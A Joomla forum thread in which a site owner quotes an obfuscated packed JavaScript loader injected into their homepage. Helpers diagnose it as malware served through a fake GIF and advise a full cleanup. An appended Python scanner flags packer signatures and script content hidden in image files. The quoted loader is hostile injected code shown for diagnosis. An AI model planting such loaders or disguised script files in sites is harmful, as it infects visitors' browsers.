
eval(function(p,a,c,k,e,d) - no Č and Ć letters

Posted: Wed Nov 15, 2017 12:04 pm
by igorjov
joomla 3.7.2
Please open banjakoviljaca.org and see the beginnings of articles on the homepage.
How can I solve this:
eval(function(p,a,c,k,e,d);if(!''.replace(/^/,String))k=[function(e)];e=function();c=1};while(c--)}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eetrn|var|u0026u|referrer|dhbrr||js|php'.split('|'),0,{}))

Thanks

Re: eval(function(p,a,c,k,e,d) - no Č and Ć letters

Posted: Wed Nov 15, 2017 12:23 pm
by fcoulter
Your site seems to be infected with malware, see https://sitecheck.sucuri.net/results/banjakoviljaca.org

There are instructions for cleaning your site here: viewtopic.php?f=714&t=946026

So far as I know, eval(function(p,a,c,k,e,d) etc. is not necessarily in itself malicious; it is sometimes used to unpack JavaScript files. However, in this case it looks like it is being used to load malware, in the first line of the HTML document. It seems to be a malicious gif document /media/media/images/progres1.gif

Re: eval(function(p,a,c,k,e,d) - no Č and Ć letters

Posted: Wed Nov 15, 2017 4:34 pm
by vincenzore1981
I would like to point out that the method described above works only if the infection is in the files. If the infection is in database data then that is not enough.

To find out, you can use phpMyAdmin and search for the "%eval(function%" string in all tables.

Re: eval(function(p,a,c,k,e,d) - no Č and Ć letters

Posted: Wed Nov 15, 2017 5:26 pm
by fcoulter
The infection is in the very first line of the html page, before even the head tag. That makes it unlikely that it would be in the database. If that were true then it would appear in the article or other content. Not at the top of the page.

Also the actual malicious script is a gif file, as I made clear before, not in the database. This makes it clear that the attacker had access to the file system, there is no other way of placing it there.

The advice I gave is for cleaning the file system, and you should do that as a matter of priority.

Yes, I would certainly check the database once you have cleaned the file system, but NOT for the "%eval(function%" string, as it is very unlikely that you will find it there. But do check it for any users with elevated privileges, e.g. administrators that should not be there.

And do not think that you can "cherry pick" by just removing the malicious code, there will almost certainly be more that you do not find by that method, and your site will then soon be re-infected.
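
An added example, not part of the original thread: a small Python triage scan for the two indicators discussed above, namely files with an image extension that are not really images or that carry script content, and site files containing the p,a,c,k,e,d packer header. The function names, sample file names and sample contents are constructed for illustration; the findings are leads for a full cleanup, not a list of everything to delete.

```python
import os, re, tempfile

# Leading bytes of genuine image files, keyed by extension.
IMAGE_MAGIC = {".gif": (b"GIF87a", b"GIF89a"), ".png": (b"\x89PNG\r\n\x1a\n",), ".jpg": (b"\xff\xd8\xff",)}
# Markers that should never occur inside an image file.
SCRIPT_MARKERS = re.compile(rb"<\?php|<script|eval\s*\(", re.I)
# Header of the p,a,c,k,e,d JavaScript packer quoted in the thread.
PACKER = re.compile(rb"eval\(function\(p,a,c,k,e,[dr]\)")
TEXT_EXTS = {".php", ".js", ".html", ".htm"}

def scan_file(path):
    """Return the list of findings for one file (empty list = nothing seen)."""
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read(2_000_000)  # cap memory use on large files
    findings = []
    if ext in IMAGE_MAGIC:
        if not data.startswith(IMAGE_MAGIC[ext]):
            findings.append("image extension but wrong magic bytes")
        if SCRIPT_MARKERS.search(data):
            findings.append("script marker inside image file")
    elif ext in TEXT_EXTS and PACKER.search(data):
        # Packed code can be legitimate; a hit is a lead to review, not proof.
        findings.append("p,a,c,k,e,d packer signature")
    return findings

def scan_tree(root):
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if hits := scan_file(path):
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report

def demo():
    """Scan a constructed sample tree (all file names and contents made up)."""
    samples = {
        "images/logo.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
        "images/fake.gif": b"eval(function(p,a,c,k,e,d){return p}('0',1,1,[],0,{}))",
        "images/poly.gif": b"GIF89a<?php /* constructed placeholder */ ?>",
        "index.php": b"<script>eval(function(p,a,c,k,e,d){return p})</script><html>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(body)
        return scan_tree(root)
```

Calling `scan_tree()` on a copy of the site's document root returns a dictionary of flagged paths; `demo()` runs the same scan over the constructed samples.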